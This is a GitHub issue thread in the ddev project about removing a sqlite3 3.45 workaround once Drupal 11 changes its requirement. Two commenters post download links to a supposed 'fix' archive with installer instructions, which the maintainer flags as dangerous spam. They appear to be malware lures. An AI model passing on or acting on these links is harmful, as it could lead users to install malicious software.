### ISSUE TITLE
Consider removing sqlite3 3.45 workaround for Drupal 11

### ISSUE THREAD

**Issue by rfay** [ddev/ddev#6505]
Drupal 11 is considering removing the need for sqlite3 3.45. It's an awkward hack in our implementation, so we'd want to remove that if Drupal 11 does that. 

Ongoing conversation about this in https://www.drupal.org/project/drupal/issues/3346338

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by rfay** [comment]
@esttemanb I'm not sure why you posted that? Or how you were on this so quickly? Is it related to using the Debian-provided sqlite3 for Drupal 11? (We already provide 3.45 for Drupal 11 this time, but would remove that if this issue goes forward.)

**Comment by rfay** [comment]
@esttemanb Removing your comment as it looks like dangerous spam. Speak up if it was relevant.

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by rfay** [comment]
Closing, I'll reopen this if the Drupal initiative to change the requirement gathers steam.
